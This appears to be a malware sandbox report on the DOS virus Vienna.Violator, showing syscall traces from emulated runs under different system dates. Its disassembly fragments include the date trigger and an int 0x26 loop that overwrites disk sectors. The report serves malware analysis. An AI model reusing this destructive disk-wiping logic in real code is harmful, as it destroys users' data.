Sample viewer

vx.netlux.org/Virus.DOS.Vienna.Violator.779.b

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:21:45.758533485Z	255	PC: 12a6a \| UNKNOWN!
2018-12-17T22:21:45.760663654Z	42	PC: 12a76 \| Get date 0x12a76: cmp cx, 0x7c7 0x12a7a: jb 0x12a92 0x12a7c: jge 0x12a80 0x12a7e: jmp 0x12ad1 0x12a80: mov ah, 0x2a 0x12a82: int 0x21 0x12a84: cmp dh, 6 0x12a87: jge 0x12a8b 0x12a89: jmp 0x12ad1 0x12a8b: cmp dl, 0x16 0x12a8e: jge 0x12ab0 0x12a90: jmp 0x12ad1 0x12a92: cmp cx, 0x7c6 0x12a96: je 0x12aa5 0x12a98: mov ah, 0x2b 0x12a9a: mov cx, 0x7c6 0x12a9d: int 0x21 0x12a9f: mov cl, 1 0x12aa1: mov ah, 0x2d 0x12aa3: int 0x21
2018-12-17T22:21:45.76307167Z	42	PC: 12a84 \| Get date 0x12a84: cmp dh, 6 0x12a87: jge 0x12a8b 0x12a89: jmp 0x12ad1 0x12a8b: cmp dl, 0x16 0x12a8e: jge 0x12ab0 0x12a90: jmp 0x12ad1 0x12a92: cmp cx, 0x7c6 0x12a96: je 0x12aa5 0x12a98: mov ah, 0x2b 0x12a9a: mov cx, 0x7c6 0x12a9d: int 0x21 0x12a9f: mov cl, 1 0x12aa1: mov ah, 0x2d 0x12aa3: int 0x21 0x12aa5: mov ah, 0x2c 0x12aa7: int 0x21 0x12aa9: cmp cl, 0xf 0x12aac: jae 0x12ab9 0x12aae: jmp 0x12a80 0x12ab0: mov ah, 9
2018-12-17T22:21:45.765485606Z	47	PC: 12ad6 \| Get disk transfer address
2018-12-17T22:21:45.767162139Z	26	PC: 12ae6 \| Set disk transfer address
2018-12-17T22:21:45.769221471Z	26	PC: 12b66 \| Set disk transfer address
2018-12-17T22:21:45.770587244Z	79	PC: 12b6c \| Find next file
2018-12-17T22:21:45.772677711Z	78	PC: 12b66 \| Find first file
2018-12-17T22:21:45.778420198Z	26	PC: 12c61 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3797,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T13:06:51.646997708Z	255	PC: 12a6a \| UNKNOWN!
2018-12-25T13:06:51.64848653Z	42	PC: 12a76 \| Get date 0x12a76: cmp cx, 0x7c7 0x12a7a: jb 0x12a92 0x12a7c: jge 0x12a80 0x12a7e: jmp 0x12ad1 0x12a80: mov ah, 0x2a 0x12a82: int 0x21 0x12a84: cmp dh, 6 0x12a87: jge 0x12a8b 0x12a89: jmp 0x12ad1 0x12a8b: cmp dl, 0x16 0x12a8e: jge 0x12ab0 0x12a90: jmp 0x12ad1 0x12a92: cmp cx, 0x7c6 0x12a96: je 0x12aa5 0x12a98: mov ah, 0x2b 0x12a9a: mov cx, 0x7c6 0x12a9d: int 0x21 0x12a9f: mov cl, 1 0x12aa1: mov ah, 0x2d 0x12aa3: int 0x21
2018-12-25T13:06:51.650470118Z	43	PC: 12a9f \| Set date
2018-12-25T13:06:51.653526777Z	45	PC: 12aa5 \| Set time
2018-12-25T13:06:51.656877151Z	44	PC: 12aa9 \| Get time 0x12aa9: cmp cl, 0xf 0x12aac: jae 0x12ab9 0x12aae: jmp 0x12a80 0x12ab0: mov ah, 9 0x12ab2: mov dx, si 0x12ab4: add dx, 0x40 0x12ab7: int 0x21 0x12ab9: cmp byte ptr [si], 0x1a 0x12abc: ja 0x12ad1 0x12abe: pushf 0x12abf: mov al, byte ptr [si] 0x12ac1: mov cx, 0x100 0x12ac4: mov bx, 1 0x12ac7: mov dx, 0 0x12aca: int 0x26 0x12acc: popf 0x12acd: inc byte ptr [si] 0x12acf: jmp 0x12ab9 0x12ad1: push es 0x12ad2: mov ah, 0x2f
2018-12-25T13:06:51.658841887Z	42	PC: 12a84 \| Get date 0x12a84: cmp dh, 6 0x12a87: jge 0x12a8b 0x12a89: jmp 0x12ad1 0x12a8b: cmp dl, 0x16 0x12a8e: jge 0x12ab0 0x12a90: jmp 0x12ad1 0x12a92: cmp cx, 0x7c6 0x12a96: je 0x12aa5 0x12a98: mov ah, 0x2b 0x12a9a: mov cx, 0x7c6 0x12a9d: int 0x21 0x12a9f: mov cl, 1 0x12aa1: mov ah, 0x2d 0x12aa3: int 0x21 0x12aa5: mov ah, 0x2c 0x12aa7: int 0x21 0x12aa9: cmp cl, 0xf 0x12aac: jae 0x12ab9 0x12aae: jmp 0x12a80 0x12ab0: mov ah, 9
2018-12-25T13:06:51.660756398Z	47	PC: 12ad6 \| Get disk transfer address
2018-12-25T13:06:51.662180883Z	26	PC: 12ae6 \| Set disk transfer address
2018-12-25T13:06:51.663224772Z	26	PC: 12b66 \| Set disk transfer address
2018-12-25T13:06:51.664220292Z	79	PC: 12b6c \| Find next file
2018-12-25T13:06:51.666102164Z	78	PC: 12b66 \| Find first file (See above)
2018-12-25T13:06:51.675534754Z	26	PC: 12c61 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1990,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3797,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:50:15.663146459Z	255	PC: 12a6a \| UNKNOWN!
2018-12-25T11:50:15.665342847Z	42	PC: 12a76 \| Get date 0x12a76: cmp cx, 0x7c7 0x12a7a: jb 0x12a92 0x12a7c: jge 0x12a80 0x12a7e: jmp 0x12ad1 0x12a80: mov ah, 0x2a 0x12a82: int 0x21 0x12a84: cmp dh, 6 0x12a87: jge 0x12a8b 0x12a89: jmp 0x12ad1 0x12a8b: cmp dl, 0x16 0x12a8e: jge 0x12ab0 0x12a90: jmp 0x12ad1 0x12a92: cmp cx, 0x7c6 0x12a96: je 0x12aa5 0x12a98: mov ah, 0x2b 0x12a9a: mov cx, 0x7c6 0x12a9d: int 0x21 0x12a9f: mov cl, 1 0x12aa1: mov ah, 0x2d 0x12aa3: int 0x21
2018-12-25T11:50:15.667954725Z	44	PC: 12aa9 \| Get time 0x12aa9: cmp cl, 0xf 0x12aac: jae 0x12ab9 0x12aae: jmp 0x12a80 0x12ab0: mov ah, 9 0x12ab2: mov dx, si 0x12ab4: add dx, 0x40 0x12ab7: int 0x21 0x12ab9: cmp byte ptr [si], 0x1a 0x12abc: ja 0x12ad1 0x12abe: pushf 0x12abf: mov al, byte ptr [si] 0x12ac1: mov cx, 0x100 0x12ac4: mov bx, 1 0x12ac7: mov dx, 0 0x12aca: int 0x26 0x12acc: popf 0x12acd: inc byte ptr [si] 0x12acf: jmp 0x12ab9 0x12ad1: push es 0x12ad2: mov ah, 0x2f
2018-12-25T11:50:15.671050054Z	47	PC: 12ad6 \| Get disk transfer address
2018-12-25T11:50:15.672687093Z	26	PC: 12ae6 \| Set disk transfer address
2018-12-25T11:50:15.674288963Z	26	PC: 12b66 \| Set disk transfer address
2018-12-25T11:50:15.676471841Z	79	PC: 12b6c \| Find next file
2018-12-25T11:50:15.678483565Z	78	PC: 12b66 \| Find first file (See above)
2018-12-25T11:50:15.686630005Z	26	PC: 12c61 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3797,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:50:15.745198981Z	255	PC: 12a6a \| UNKNOWN!
2018-12-25T11:50:15.745914556Z	42	PC: 12a76 \| Get date 0x12a76: cmp cx, 0x7c7 0x12a7a: jb 0x12a92 0x12a7c: jge 0x12a80 0x12a7e: jmp 0x12ad1 0x12a80: mov ah, 0x2a 0x12a82: int 0x21 0x12a84: cmp dh, 6 0x12a87: jge 0x12a8b 0x12a89: jmp 0x12ad1 0x12a8b: cmp dl, 0x16 0x12a8e: jge 0x12ab0 0x12a90: jmp 0x12ad1 0x12a92: cmp cx, 0x7c6 0x12a96: je 0x12aa5 0x12a98: mov ah, 0x2b 0x12a9a: mov cx, 0x7c6 0x12a9d: int 0x21 0x12a9f: mov cl, 1 0x12aa1: mov ah, 0x2d 0x12aa3: int 0x21
2018-12-25T11:50:15.748540153Z	42	PC: 12a84 \| Get date 0x12a84: cmp dh, 6 0x12a87: jge 0x12a8b 0x12a89: jmp 0x12ad1 0x12a8b: cmp dl, 0x16 0x12a8e: jge 0x12ab0 0x12a90: jmp 0x12ad1 0x12a92: cmp cx, 0x7c6 0x12a96: je 0x12aa5 0x12a98: mov ah, 0x2b 0x12a9a: mov cx, 0x7c6 0x12a9d: int 0x21 0x12a9f: mov cl, 1 0x12aa1: mov ah, 0x2d 0x12aa3: int 0x21 0x12aa5: mov ah, 0x2c 0x12aa7: int 0x21 0x12aa9: cmp cl, 0xf 0x12aac: jae 0x12ab9 0x12aae: jmp 0x12a80 0x12ab0: mov ah, 9
2018-12-25T11:50:15.750821081Z	47	PC: 12ad6 \| Get disk transfer address
2018-12-25T11:50:15.752190928Z	26	PC: 12ae6 \| Set disk transfer address
2018-12-25T11:50:15.754402601Z	26	PC: 12b66 \| Set disk transfer address
2018-12-25T11:50:15.755685653Z	79	PC: 12b6c \| Find next file
2018-12-25T11:50:15.757766463Z	78	PC: 12b66 \| Find first file (See above)
2018-12-25T11:50:15.763167635Z	26	PC: 12c61 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3797,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:50:15.76379249Z	255	PC: 12a6a \| UNKNOWN!
2018-12-25T11:50:15.766011869Z	42	PC: 12a76 \| Get date 0x12a76: cmp cx, 0x7c7 0x12a7a: jb 0x12a92 0x12a7c: jge 0x12a80 0x12a7e: jmp 0x12ad1 0x12a80: mov ah, 0x2a 0x12a82: int 0x21 0x12a84: cmp dh, 6 0x12a87: jge 0x12a8b 0x12a89: jmp 0x12ad1 0x12a8b: cmp dl, 0x16 0x12a8e: jge 0x12ab0 0x12a90: jmp 0x12ad1 0x12a92: cmp cx, 0x7c6 0x12a96: je 0x12aa5 0x12a98: mov ah, 0x2b 0x12a9a: mov cx, 0x7c6 0x12a9d: int 0x21 0x12a9f: mov cl, 1 0x12aa1: mov ah, 0x2d 0x12aa3: int 0x21
2018-12-25T11:50:15.771836748Z	43	PC: 12a9f \| Set date
2018-12-25T11:50:15.77557302Z	45	PC: 12aa5 \| Set time
2018-12-25T11:50:15.779068385Z	44	PC: 12aa9 \| Get time 0x12aa9: cmp cl, 0xf 0x12aac: jae 0x12ab9 0x12aae: jmp 0x12a80 0x12ab0: mov ah, 9 0x12ab2: mov dx, si 0x12ab4: add dx, 0x40 0x12ab7: int 0x21 0x12ab9: cmp byte ptr [si], 0x1a 0x12abc: ja 0x12ad1 0x12abe: pushf 0x12abf: mov al, byte ptr [si] 0x12ac1: mov cx, 0x100 0x12ac4: mov bx, 1 0x12ac7: mov dx, 0 0x12aca: int 0x26 0x12acc: popf 0x12acd: inc byte ptr [si] 0x12acf: jmp 0x12ab9 0x12ad1: push es 0x12ad2: mov ah, 0x2f
2018-12-25T11:50:15.786525597Z	42	PC: 12a84 \| Get date 0x12a84: cmp dh, 6 0x12a87: jge 0x12a8b 0x12a89: jmp 0x12ad1 0x12a8b: cmp dl, 0x16 0x12a8e: jge 0x12ab0 0x12a90: jmp 0x12ad1 0x12a92: cmp cx, 0x7c6 0x12a96: je 0x12aa5 0x12a98: mov ah, 0x2b 0x12a9a: mov cx, 0x7c6 0x12a9d: int 0x21 0x12a9f: mov cl, 1 0x12aa1: mov ah, 0x2d 0x12aa3: int 0x21 0x12aa5: mov ah, 0x2c 0x12aa7: int 0x21 0x12aa9: cmp cl, 0xf 0x12aac: jae 0x12ab9 0x12aae: jmp 0x12a80 0x12ab0: mov ah, 9
2018-12-25T11:50:15.789317052Z	47	PC: 12ad6 \| Get disk transfer address
2018-12-25T11:50:15.79095657Z	26	PC: 12ae6 \| Set disk transfer address
2018-12-25T11:50:15.792991386Z	26	PC: 12b66 \| Set disk transfer address
2018-12-25T11:50:15.794273943Z	79	PC: 12b6c \| Find next file
2018-12-25T11:50:15.796827231Z	78	PC: 12b66 \| Find first file (See above)
2018-12-25T11:50:15.809312025Z	26	PC: 12c61 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3797,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:50:15.847286975Z	255	PC: 12a6a \| UNKNOWN!
2018-12-25T11:50:15.848267421Z	42	PC: 12a76 \| Get date 0x12a76: cmp cx, 0x7c7 0x12a7a: jb 0x12a92 0x12a7c: jge 0x12a80 0x12a7e: jmp 0x12ad1 0x12a80: mov ah, 0x2a 0x12a82: int 0x21 0x12a84: cmp dh, 6 0x12a87: jge 0x12a8b 0x12a89: jmp 0x12ad1 0x12a8b: cmp dl, 0x16 0x12a8e: jge 0x12ab0 0x12a90: jmp 0x12ad1 0x12a92: cmp cx, 0x7c6 0x12a96: je 0x12aa5 0x12a98: mov ah, 0x2b 0x12a9a: mov cx, 0x7c6 0x12a9d: int 0x21 0x12a9f: mov cl, 1 0x12aa1: mov ah, 0x2d 0x12aa3: int 0x21
2018-12-25T11:50:15.850864408Z	43	PC: 12a9f \| Set date
2018-12-25T11:50:15.85411431Z	45	PC: 12aa5 \| Set time
2018-12-25T11:50:15.857577261Z	44	PC: 12aa9 \| Get time 0x12aa9: cmp cl, 0xf 0x12aac: jae 0x12ab9 0x12aae: jmp 0x12a80 0x12ab0: mov ah, 9 0x12ab2: mov dx, si 0x12ab4: add dx, 0x40 0x12ab7: int 0x21 0x12ab9: cmp byte ptr [si], 0x1a 0x12abc: ja 0x12ad1 0x12abe: pushf 0x12abf: mov al, byte ptr [si] 0x12ac1: mov cx, 0x100 0x12ac4: mov bx, 1 0x12ac7: mov dx, 0 0x12aca: int 0x26 0x12acc: popf 0x12acd: inc byte ptr [si] 0x12acf: jmp 0x12ab9 0x12ad1: push es 0x12ad2: mov ah, 0x2f
2018-12-25T11:50:15.860569508Z	42	PC: 12a84 \| Get date 0x12a84: cmp dh, 6 0x12a87: jge 0x12a8b 0x12a89: jmp 0x12ad1 0x12a8b: cmp dl, 0x16 0x12a8e: jge 0x12ab0 0x12a90: jmp 0x12ad1 0x12a92: cmp cx, 0x7c6 0x12a96: je 0x12aa5 0x12a98: mov ah, 0x2b 0x12a9a: mov cx, 0x7c6 0x12a9d: int 0x21 0x12a9f: mov cl, 1 0x12aa1: mov ah, 0x2d 0x12aa3: int 0x21 0x12aa5: mov ah, 0x2c 0x12aa7: int 0x21 0x12aa9: cmp cl, 0xf 0x12aac: jae 0x12ab9 0x12aae: jmp 0x12a80 0x12ab0: mov ah, 9
2018-12-25T11:50:15.863807615Z	47	PC: 12ad6 \| Get disk transfer address
2018-12-25T11:50:15.865314128Z	26	PC: 12ae6 \| Set disk transfer address
2018-12-25T11:50:15.867684567Z	26	PC: 12b66 \| Set disk transfer address
2018-12-25T11:50:15.869245787Z	79	PC: 12b6c \| Find next file
2018-12-25T11:50:15.871513318Z	78	PC: 12b66 \| Find first file (See above)
2018-12-25T11:50:15.881589609Z	26	PC: 12c61 \| Set disk transfer address

{"DateBased":true,"Day":22,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3797,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:50:16.060598107Z	255	PC: 12a6a \| UNKNOWN!
2018-12-25T11:50:16.061858253Z	42	PC: 12a76 \| Get date 0x12a76: cmp cx, 0x7c7 0x12a7a: jb 0x12a92 0x12a7c: jge 0x12a80 0x12a7e: jmp 0x12ad1 0x12a80: mov ah, 0x2a 0x12a82: int 0x21 0x12a84: cmp dh, 6 0x12a87: jge 0x12a8b 0x12a89: jmp 0x12ad1 0x12a8b: cmp dl, 0x16 0x12a8e: jge 0x12ab0 0x12a90: jmp 0x12ad1 0x12a92: cmp cx, 0x7c6 0x12a96: je 0x12aa5 0x12a98: mov ah, 0x2b 0x12a9a: mov cx, 0x7c6 0x12a9d: int 0x21 0x12a9f: mov cl, 1 0x12aa1: mov ah, 0x2d 0x12aa3: int 0x21
2018-12-25T11:50:16.064032768Z	43	PC: 12a9f \| Set date
2018-12-25T11:50:16.066854419Z	45	PC: 12aa5 \| Set time
2018-12-25T11:50:16.069221343Z	44	PC: 12aa9 \| Get time 0x12aa9: cmp cl, 0xf 0x12aac: jae 0x12ab9 0x12aae: jmp 0x12a80 0x12ab0: mov ah, 9 0x12ab2: mov dx, si 0x12ab4: add dx, 0x40 0x12ab7: int 0x21 0x12ab9: cmp byte ptr [si], 0x1a 0x12abc: ja 0x12ad1 0x12abe: pushf 0x12abf: mov al, byte ptr [si] 0x12ac1: mov cx, 0x100 0x12ac4: mov bx, 1 0x12ac7: mov dx, 0 0x12aca: int 0x26 0x12acc: popf 0x12acd: inc byte ptr [si] 0x12acf: jmp 0x12ab9 0x12ad1: push es 0x12ad2: mov ah, 0x2f
2018-12-25T11:50:16.071350264Z	42	PC: 12a84 \| Get date 0x12a84: cmp dh, 6 0x12a87: jge 0x12a8b 0x12a89: jmp 0x12ad1 0x12a8b: cmp dl, 0x16 0x12a8e: jge 0x12ab0 0x12a90: jmp 0x12ad1 0x12a92: cmp cx, 0x7c6 0x12a96: je 0x12aa5 0x12a98: mov ah, 0x2b 0x12a9a: mov cx, 0x7c6 0x12a9d: int 0x21 0x12a9f: mov cl, 1 0x12aa1: mov ah, 0x2d 0x12aa3: int 0x21 0x12aa5: mov ah, 0x2c 0x12aa7: int 0x21 0x12aa9: cmp cl, 0xf 0x12aac: jae 0x12ab9 0x12aae: jmp 0x12a80 0x12ab0: mov ah, 9
2018-12-25T11:50:16.073176775Z	9	PC: 12ab9 \| Display string (String= ' Violator strikes again... ')
2018-12-25T11:50:16.0771765Z	47	PC: 12ad6 \| Get disk transfer address
2018-12-25T11:50:16.078619905Z	26	PC: 12ae6 \| Set disk transfer address
2018-12-25T11:50:16.079530817Z	26	PC: 12b66 \| Set disk transfer address
2018-12-25T11:50:16.080593137Z	79	PC: 12b6c \| Find next file
2018-12-25T11:50:16.088578557Z	78	PC: 12b66 \| Find first file (See above)
2018-12-25T11:50:16.095977734Z	26	PC: 12c61 \| Set disk transfer address